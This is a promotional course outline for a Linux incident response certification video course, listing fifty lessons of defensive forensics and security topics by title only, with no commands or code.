Legitimized [GIAC Linux Incident Responder (GLIR)] Expert – Led Video Course – MASTERYTRAIL

Lesson 1: Introduction to Linux Incident Response

1.1 Understanding Incident Response in Cybersecurity
1.2 Why Linux Incident Response Matters
1.3 Key Incident Response Principles
1.4 Linux in Enterprise Environments
1.5 Types of Linux Threats and Attacks
1.6 Role of an Incident Responder
1.7 Core Linux Incident Response Tools
1.8 Lifecycle of an Incident Response Process
1.9 Integrating GLIR with Organizational Security Strategy
1.10 Certification Overview and Career Benefits

Lesson 2: Linux Operating System Fundamentals

2.1 Linux Architecture Overview
2.2 Kernel and User Space
2.3 Linux File System Hierarchy
2.4 Common Linux Distributions in Enterprise
2.5 Linux Boot Process and Init Systems
2.6 System Daemons and Services
2.7 User Accounts and Privileges
2.8 File Permissions and Ownership
2.9 Logging Mechanisms in Linux
2.10 Package Management Systems

Lesson 3: Incident Response Methodology

3.1 NIST and SANS IR Frameworks
3.2 Phases of Incident Response
3.3 Preparation Phase for Linux IR
3.4 Detection and Analysis in Linux Systems
3.5 Containment Strategies for Linux
3.6 Eradication Approaches
3.7 Recovery Phase Best Practices
3.8 Post-Incident Activity and Documentation
3.9 Legal and Compliance Considerations
3.10 Role of Automation in IR

Lesson 4: Linux File System Forensics

4.1 File System Structures (EXT, XFS, Btrfs)
4.2 Metadata and Inode Analysis
4.3 File Timestamps and Interpretation
4.4 Recovering Deleted Files
4.5 Hidden Files and Directories
4.6 Mount Points and Storage Devices
4.7 Journaling and Transaction Logs
4.8 File Integrity Verification
4.9 Tools for File System Forensics
4.10 Case Study: Compromised File System

Lesson 5: Linux Logging and Audit Systems

5.1 Syslog Architecture
5.2 journald vs syslog-ng
5.3 Application-Level Logging
5.4 Kernel Logs and Security Events
5.5 Authentication Logs (/var/log/secure)
5.6 Auditd for Security Auditing
5.7 Configuring Log Rotation and Retention
5.8 Log Correlation with SIEM Tools
5.9 Detecting Log Manipulation
5.10 Practical Lab on Log Analysis

Lesson 6: Process and Memory Analysis

6.1 Understanding Linux Processes
6.2 Process Hierarchies and Trees
6.3 Investigating Suspicious Processes
6.4 ps, top, and htop Analysis
6.5 Memory Dump Collection Techniques
6.6 Analyzing Linux Core Dumps
6.7 Identifying Rogue Daemons
6.8 Detecting Rootkits in Memory
6.9 Volatility and Rekall for Linux Memory Analysis
6.10 Hands-On: Live Process Forensics

Lesson 7: User and Authentication Forensics

7.1 Linux User Account Structures (/etc/passwd, /etc/shadow)
7.2 Tracking User Activity with Logs
7.3 sudo and su Command Monitoring
7.4 SSH Access Logs and Keys
7.5 Investigating Unauthorized User Creation
7.6 Identifying Brute Force Attempts
7.7 PAM Authentication Modules
7.8 Analyzing Privilege Escalation Attempts
7.9 Detecting Backdoor Accounts
7.10 Hands-On: Authentication Log Analysis

Lesson 8: Network Forensics on Linux

8.1 Linux Network Stack Overview
8.2 ifconfig, ip, and netstat for IR
8.3 Identifying Active Network Connections
8.4 Detecting Malicious Listening Ports
8.5 Packet Capture with tcpdump
8.6 Wireshark/Tshark for Linux Analysis
8.7 NetFlow and Network Traffic Analysis
8.8 Detecting Beaconing Activity
8.9 Firewall Logs and Intrusion Attempts
8.10 Practical Lab: Network Compromise Detection

Lesson 9: Malware Analysis on Linux

9.1 Linux Malware Types and Techniques
9.2 Analyzing ELF Binaries
9.3 Detecting Malicious Shell Scripts
9.4 Cronjob Persistence Methods
9.5 Dynamic vs Static Malware Analysis
9.6 Sandboxing Linux Malware
9.7 Reverse Engineering Linux Backdoors
9.8 YARA Rules for Linux Malware Detection
9.9 Indicators of Compromise (IoCs) for Linux Malware
9.10 Hands-On: Analyzing a Linux Malware Sample

Lesson 10: Rootkits and Kernel-Level Threats

10.1 Rootkit Fundamentals
10.2 Types of Linux Rootkits
10.3 Kernel vs User-Space Rootkits
10.4 Detecting Hidden Processes
10.5 Identifying File System Redirection
10.6 Checking Kernel Modules (lsmod, modinfo)
10.7 Rootkit Scanners (chkrootkit, rkhunter)
10.8 Analyzing System Call Hooks
10.9 Advanced Kernel Memory Forensics
10.10 Case Study: Rootkit Investigation

Lesson 11: Threat Hunting in Linux

11.1 Principles of Threat Hunting
11.2 Hunting for Persistence Mechanisms
11.3 Analyzing Bash History Files
11.4 Searching for Hidden Crontabs
11.5 Detecting Anomalous Processes
11.6 Hunting for Suspicious Network Activity
11.7 Memory-Based Threat Hunting
11.8 YARA-Based Hunting on Linux
11.9 Using OSQuery for Threat Hunting
11.10 Hands-On: Threat Hunting Playbook

Lesson 12: Evidence Acquisition and Preservation

12.1 Importance of Chain of Custody
12.2 Live vs Dead Box Acquisition
12.3 Disk Imaging with dd and dc3dd
12.4 Network Traffic Capture
12.5 RAM Capture Best Practices
12.6 File Hashing and Verification
12.7 Metadata Preservation
12.8 Ensuring Forensic Soundness
12.9 Using Write Blockers in Linux Investigations
12.10 Hands-On: Creating Forensic Images

Lesson 13: Log Correlation and SIEM Integration

13.1 Centralized Log Management in Linux
13.2 Syslog Forwarding
13.3 SIEM Tools (Splunk, ELK, Graylog)
13.4 Parsing Linux Security Logs
13.5 Normalizing Event Data
13.6 Correlation Rules for Linux Security
13.7 Alerting on Suspicious Activity
13.8 Detecting Insider Threats via Logs
13.9 Cloud SIEM Integration for Linux Systems
13.10 Hands-On: Building a Linux Log Dashboard

Lesson 14: Incident Scoping and Impact Assessment

14.1 Identifying Scope of Linux Incidents
14.2 Defining Impact in Business Terms
14.3 Classifying Incident Severity Levels
14.4 Data Exfiltration Indicators
14.5 Assessing Service Availability Impact
14.6 Evaluating Confidentiality and Integrity Breaches
14.7 Determining Affected Systems
14.8 Incident Timeline Reconstruction
14.9 Reporting to Stakeholders
14.10 Hands-On: Incident Scoping Exercise

Lesson 15: Containment Strategies for Linux Attacks

15.1 Isolating Compromised Hosts
15.2 Stopping Malicious Processes
15.3 Blocking Suspicious IPs and Ports
15.4 Temporary User Lockdowns
15.5 Network Segmentation for Containment
15.6 Using iptables and firewalld for Quick Defense
15.7 Containing Insider Threats
15.8 Using Snapshots for Containment
15.9 Rolling Back Changes Safely
15.10 Practical Lab: Live Containment Scenarios

Lesson 16: Eradication and Recovery in Linux

16.1 Removing Malware and Backdoors
16.2 Cleaning Suspicious Cronjobs
16.3 Verifying System Binaries Integrity
16.4 Kernel Patch Management
16.5 User Account Cleanup
16.6 Restoring from Clean Backups
16.7 Hardening System Configurations
16.8 Application Reinstallation Strategies
16.9 Business Continuity Planning
16.10 Case Study: Linux Recovery Plan

Lesson 17: Linux Incident Response Automation

17.1 Bash Scripting for IR
17.2 Python Automation for Linux Forensics
17.3 Automating Log Collection
17.4 Automated IoC Scanning
17.5 Orchestration Tools (Ansible, Puppet)
17.6 Using Cron for IR Automation
17.7 Automating Evidence Preservation
17.8 Integration with SOAR Platforms
17.9 Automated Threat Hunting Scripts
17.10 Hands-On: Build an IR Automation Script

Lesson 18: Cloud and Virtual Linux Incident Response

18.1 Linux in Cloud Environments
18.2 Incident Response in AWS EC2 Instances
18.3 GCP Linux VM Security Monitoring
18.4 Azure Linux IR Considerations
18.5 Hypervisor-Level Threats
18.6 Containerized Linux Incident Response
18.7 Docker Forensics Techniques
18.8 Kubernetes Incident Response
18.9 Snapshots and Cloud Logging
18.10 Hands-On: Linux Cloud Incident Response

Lesson 19: Insider Threat Investigations

19.1 Characteristics of Insider Threats
19.2 Detecting Unauthorized User Behavior
19.3 File Access Monitoring
19.4 Command History Investigations
19.5 Privilege Misuse Detection
19.6 Unauthorized Data Transfers
19.7 Behavioral Analytics on Linux
19.8 Correlation with HR/Employee Data
19.9 Case Studies of Insider Attacks
19.10 Practical Lab: Insider Threat Detection

Lesson 20: Digital Forensics Tools for Linux IR

20.1 Sleuth Kit and Autopsy
20.2 Plaso (Log2Timeline)
20.3 Foremost and Scalpel File Recovery
20.4 Binwalk for Binary Analysis
20.5 Linux Timeline Analysis Tools
20.6 Memory Analysis Tools for Linux
20.7 Network Forensics Tools (Bro/Zeek)
20.8 File Integrity Monitoring (AIDE, Tripwire)
20.9 Multi-Tool IR Frameworks (GRR, Velociraptor)
20.10 Hands-On: Tool Integration Exercise

Lesson 21: Threat Intelligence for Linux Incidents

21.1 Role of Threat Intelligence in IR
21.2 Types of Threat Intelligence (Tactical, Operational, Strategic)
21.3 Open-Source Threat Intelligence Feeds
21.4 Integrating IoCs into Linux Defense
21.5 STIX/TAXII for Threat Intel Sharing
21.6 Analyzing Threat Actor TTPs
21.7 Linux-Specific Threat Campaigns
21.8 Enriching Logs with Threat Intel
21.9 Collaboration with ISACs and CERTs
21.10 Practical Lab: Applying Threat Intel

Lesson 22: Persistence Mechanisms in Linux

22.1 Common Linux Persistence Techniques
22.2 Cronjobs and At Jobs
22.3 Modifying Init and Systemd Scripts
22.4 SSH Key Abuse
22.5 LD_PRELOAD Hijacking
22.6 Kernel Module Persistence
22.7 Malicious Aliases and Bashrc Edits
22.8 Hidden Startup Scripts
22.9 Detecting and Removing Persistence
22.10 Hands-On: Persistence Hunting

Lesson 23: Linux Host Hardening for IR Readiness

23.1 Security Baselines for Linux
23.2 Disabling Unnecessary Services
23.3 Secure SSH Configuration
23.4 Strong Password and Key Policies
23.5 File Integrity Monitoring Tools
23.6 Mandatory Access Controls (SELinux, AppArmor)
23.7 Sysctl Hardening for Networking
23.8 Secure Logging Configurations
23.9 Patch and Update Management
23.10 Practical Lab: Hardening a Linux Host

Lesson 24: Data Exfiltration on Linux

24.1 Techniques for Data Exfiltration
24.2 Exfiltration via SSH and SCP
24.3 HTTP/HTTPS Data Leaks
24.4 Covert Channels (ICMP, DNS)
24.5 Analyzing Outbound Traffic
24.6 Detecting Encrypted Tunnels
24.7 Insider Threat Data Theft
24.8 Network DLP Solutions for Linux
24.9 Correlating Logs for Exfiltration Detection
24.10 Hands-On: Data Exfiltration Analysis

Lesson 25: Insider and Advanced Persistent Threats (APTs)

25.1 Understanding APT Characteristics
25.2 Linux as a Target for APTs
25.3 Lateral Movement in Linux Environments
25.4 Privilege Escalation in APT Campaigns
25.5 Advanced Persistence in Linux
25.6 Stealth Techniques of APTs
25.7 APT Case Studies on Linux Systems
25.8 Detecting Low-and-Slow Attacks
25.9 Tools for APT Detection in Linux
25.10 Practical Lab: APT Simulation

Lesson 26: Disk Forensics on Linux Systems

26.1 Disk Imaging Techniques
26.2 Partition Table Analysis
26.3 File Carving with Linux Tools
26.4 Deleted Partition Recovery
26.5 Encrypted Disk Analysis
26.6 Swap Space Forensics
26.7 Logical Volume Manager (LVM) Forensics
26.8 RAID and Complex Storage Analysis
26.9 Disk Hashing and Verification
26.10 Hands-On: Disk Investigation

Lesson 27: Memory Acquisition and Analysis

27.1 Importance of Linux Memory Forensics
27.2 Memory Acquisition Tools (LiME, AVML)
27.3 Dumping Memory from Virtual Machines
27.4 Volatility Profiles for Linux
27.5 Kernel Memory Structures
27.6 Analyzing Running Processes in RAM
27.7 Extracting Network Connections from Memory
27.8 Detecting In-Memory Malware
27.9 Timeline Analysis from Memory Dumps
27.10 Practical Lab: Memory Case Study

Lesson 28: Email and Messaging Investigations

28.1 Email Infrastructure on Linux Servers
28.2 Forensic Analysis of Mail Logs
28.3 SMTP, IMAP, POP3 Tracking
28.4 Detecting Phishing Campaigns
28.5 Linux Email Header Analysis
28.6 Investigating Webmail Logs
28.7 Linux-Based Messaging Apps (IRC, XMPP)
28.8 Data Exfiltration via Email
28.9 Email Evidence Preservation
28.10 Hands-On: Email Compromise Case

Lesson 29: Database Forensics on Linux

29.1 Common Databases on Linux (MySQL, PostgreSQL)
29.2 Investigating Unauthorized Access
29.3 Log Files for Database Forensics
29.4 SQL Injection Detection
29.5 Recovering Deleted Database Entries
29.6 Tracking Insider Database Abuse
29.7 Encryption in Databases
29.8 Database Backups as Evidence
29.9 Forensic Tools for Database Analysis
29.10 Hands-On: Database Incident

Lesson 30: Web Server Incident Response

30.1 Apache and Nginx Forensics
30.2 Web Application Logs (/var/log/httpd, /var/log/nginx)
30.3 SQL Injection Attack Detection
30.4 Webshell Detection on Linux Servers
30.5 CMS Exploits (WordPress, Drupal, Joomla)
30.6 SSL/TLS Log Analysis
30.7 File Integrity Checks on Webroots
30.8 Access Log Correlation
30.9 Recovering Compromised Websites
30.10 Practical Lab: Web Server IR

Lesson 31: Container Incident Response

31.1 Container Security Challenges
31.2 Docker Architecture and Risks
31.3 Forensic Acquisition of Containers
31.4 Identifying Malicious Container Images
31.5 Docker Log Analysis
31.6 Container Runtime Forensics
31.7 Kubernetes Incident Response Workflow
31.8 Detecting Escapes from Containers
31.9 Best Practices for Container IR
31.10 Hands-On: Docker Incident Analysis

Lesson 32: Ransomware in Linux Environments

32.1 Linux Ransomware Evolution
32.2 Common Attack Vectors for Ransomware
32.3 File Encryption Detection on Linux
32.4 Ransomware Persistence Methods
32.5 Monitoring File System Changes
32.6 Backup and Recovery Strategies
32.7 Incident Response to Ransomware
32.8 Case Studies of Linux Ransomware
32.9 Negotiation and Legal Considerations
32.10 Hands-On: Ransomware Detection

Lesson 33: Industrial and IoT Linux Incident Response

33.1 Role of Linux in IoT/OT Systems
33.2 Incident Response in Industrial Linux Devices
33.3 Unique IoT Attack Vectors
33.4 Embedded Linux Forensics
33.5 Log Collection in IoT Devices
33.6 IoT Botnet Investigations
33.7 IoT Firmware Analysis
33.8 Incident Response in SCADA/ICS Systems
33.9 Securing IoT Linux Devices Post-Incident
33.10 Case Study: IoT Botnet Attack

Lesson 34: Supply Chain and Open Source Threats

34.1 Linux Package Supply Chain Risks
34.2 Dependency Attacks in Linux Systems
34.3 Malicious Code in Open Source Packages
34.4 Detecting Backdoored Libraries
34.5 Verifying GPG Package Signatures
34.6 Git Repository Forensics
34.7 Compromised Build Servers
34.8 Monitoring Open Source Threats
34.9 Post-Incident Supply Chain Mitigation
34.10 Practical Lab: Supply Chain Breach

Lesson 35: Incident Documentation and Reporting

35.1 Importance of Documentation in IR
35.2 Standard Incident Reporting Templates
35.3 Recording Evidence in Linux Cases
35.4 Chain of Custody Documentation
35.5 Communicating with Executives
35.6 Regulatory Reporting (GDPR, HIPAA, PCI DSS)
35.7 Using Ticketing Systems for IR
35.8 Post-Incident Lessons Learned Reports
35.9 Continuous Improvement via Reports
35.10 Hands-On: Drafting an IR Report

Lesson 36: Insider Threat Red Team Simulation

36.1 Understanding Red Team Methodology
36.2 Simulating Insider Linux Attacks
36.3 Creating Fake Accounts
36.4 Deploying Rogue Processes
36.5 Mimicking Data Exfiltration
36.6 Red Team Toolkits for Linux
36.7 Detection Evasion Tactics
36.8 Collecting IR Team Responses
36.9 Evaluating Incident Response Effectiveness
36.10 Practical Lab: Red Team vs IR

Lesson 37: Security Monitoring with Linux Tools

37.1 Host-Based IDS (OSSEC, Wazuh)
37.2 Network IDS on Linux (Snort, Suricata)
37.3 Real-Time Monitoring with Auditd
37.4 Using Sysdig for Security Events
37.5 OSQuery for Continuous Monitoring
37.6 Integrating SIEM Alerts
37.7 Detecting File Integrity Changes
37.8 Monitoring Command Execution
37.9 Correlating Multi-Host Activity
37.10 Hands-On: Linux Monitoring Lab

Lesson 38: Incident Coordination and Teamwork

38.1 Role of an IR Team in Linux Cases
38.2 IR Team Roles and Responsibilities
38.3 Coordinating Across Teams (IT, HR, Legal)
38.4 Incident Response Playbooks
38.5 Communication During Linux Incidents
38.6 Avoiding Alert Fatigue
38.7 Escalation Procedures
38.8 Stakeholder Engagement
38.9 Post-Incident Collaboration Meetings
38.10 Case Study: Coordinated Linux IR

Lesson 39: Cyber Crisis Management

39.1 Definition of a Cyber Crisis
39.2 Crisis Management Frameworks
39.3 Handling Widespread Linux Attacks
39.4 Managing Media and Public Relations
39.5 Regulatory Obligations During Crisis
39.6 Decision-Making Under Pressure
39.7 Business Continuity During Crisis
39.8 Lessons Learned Post-Crisis
39.9 Building Crisis Simulations
39.10 Hands-On: Crisis Management Drill

Lesson 40: Incident Response Metrics and KPIs

40.1 Importance of Metrics in IR
40.2 Mean Time to Detect (MTTD)
40.3 Mean Time to Respond (MTTR)
40.4 Incident Containment Timeframes
40.5 Percentage of Incidents Detected via Automation
40.6 Linux-Specific Incident Metrics
40.7 Tracking Repeat Incidents
40.8 Incident Cost Estimation
40.9 Reporting KPIs to Executives
40.10 Hands-On: Build an IR Metrics Dashboard

Lesson 41: Digital Evidence Handling in Court

41.1 Legal Frameworks for Evidence
41.2 Chain of Custody in Linux Investigations
41.3 Admissibility of Linux Digital Evidence
41.4 Expert Witness Role
41.5 Cross-Border Evidence Challenges
41.6 Data Privacy Regulations
41.7 Court Presentation of Linux IR Findings
41.8 Documentation for Legal Cases
41.9 Past Case Studies Involving Linux
41.10 Hands-On: Mock Court Presentation

Lesson 42: Linux Honeypots for Incident Detection

42.1 Role of Honeypots in IR
42.2 Deploying Linux-Based Honeypots
42.3 Low vs High Interaction Honeypots
42.4 Cowrie SSH Honeypot
42.5 Kippo and Other Honeypot Frameworks
42.6 Collecting Attacker TTPs
42.7 Integrating Honeypots with SIEM
42.8 Legal and Ethical Considerations
42.9 Analyzing Honeypot Logs
42.10 Hands-On: Deploy a Linux Honeypot

Lesson 43: Machine Learning in Linux IR

43.1 Role of ML in Security Monitoring
43.2 ML Models for Anomaly Detection
43.3 Training Models with Linux Logs
43.4 Detecting Outlier Network Traffic
43.5 Identifying Malicious Commands via ML
43.6 Using ML in SIEM Platforms
43.7 Advantages and Limitations of ML in IR
43.8 Case Studies of ML in Incident Response
43.9 Open Source ML Security Tools
43.10 Hands-On: Build an ML Anomaly Detector

Lesson 44: Incident Response in Hybrid Environments

44.1 Linux in Hybrid Cloud Architectures
44.2 Multi-Cloud Incident Response Challenges
44.3 On-Prem vs Cloud Linux Forensics
44.4 Centralized Log Collection in Hybrid IR
44.5 Unified Threat Detection Approaches
44.6 Hybrid Network Forensics
44.7 Case Studies of Hybrid Incidents
44.8 IR Policy Adaptation for Hybrid Environments
44.9 Tools for Hybrid IR Visibility
44.10 Hands-On: Hybrid IR Exercise

Lesson 45: Linux Security Monitoring with EDR/XDR

45.1 Endpoint Detection and Response Overview
45.2 EDR Capabilities for Linux
45.3 Extended Detection and Response (XDR) Concepts
45.4 Agent-Based Monitoring for Linux Hosts
45.5 Detecting Advanced Persistence
45.6 Automated Containment with EDR
45.7 Integrating Linux EDR with SIEM
45.8 Evaluating EDR Solutions for Linux
45.9 Case Study: EDR Detecting Linux Malware
45.10 Hands-On: EDR Alert Investigation

Lesson 46: Building an IR Playbook for Linux

46.1 Importance of Playbooks in IR
46.2 Components of a Linux IR Playbook
46.3 Standard Operating Procedures (SOPs)
46.4 Decision Trees for Incident Types
46.5 Automation Integration in Playbooks
46.6 Testing and Updating Playbooks
46.7 Playbook Customization by Industry
46.8 Sharing Playbooks with Teams
46.9 Lessons from Failed Playbooks
46.10 Hands-On: Create a Linux IR Playbook

Lesson 47: Post-Incident Activities and Lessons Learned

47.1 Incident Review Process
47.2 Identifying Root Causes
47.3 Gap Analysis in IR Processes
47.4 Updating Linux Security Policies
47.5 Training Needs Identification
47.6 Strengthening Preventive Controls
47.7 Updating Threat Intelligence Feeds
47.8 Improving Collaboration Post-Incident
47.9 Building a Continuous Improvement Loop
47.10 Hands-On: Lessons Learned Workshop

Lesson 48: Linux Security Compliance and Standards

48.1 Common Compliance Frameworks (ISO, NIST, CIS)
48.2 PCI DSS and Linux Servers
48.3 HIPAA Compliance in Linux Environments
48.4 GDPR Data Protection and Linux Systems
48.5 Audit Readiness in Linux IR
48.6 Compliance-Driven Logging Requirements
48.7 Security Benchmarks for Linux (CIS Benchmarks)
48.8 Mapping IR Activities to Compliance Controls
48.9 Case Studies of Compliance Failures
48.10 Practical Lab: Compliance Checklist

Lesson 49: Building a Linux IR Lab Environment

49.1 Requirements for an IR Lab
49.2 Virtual Machines for Testing
49.3 Network Simulation for Attacks
49.4 Setting Up Linux Targets
49.5 Deploying Monitoring Tools
49.6 Simulating Attacks in Lab
49.7 Collecting Evidence from Lab Incidents
49.8 Testing Playbooks in Lab
49.9 Red vs Blue Team Exercises
49.10 Hands-On: Build Your Own IR Lab

Lesson 50: Final Capstone ? Comprehensive Linux IR Simulation

50.1 Simulated Linux Compromise Scenario
50.2 Evidence Acquisition Phase
50.3 Log Analysis and Threat Hunting
50.4 Malware Detection in Linux Host
50.5 Rootkit Investigation
50.6 Data Exfiltration Analysis
50.7 Containment and Eradication Actions
50.8 Recovery of Affected Systems
50.9 Post-Incident Documentation
50.10 Capstone Project Presentation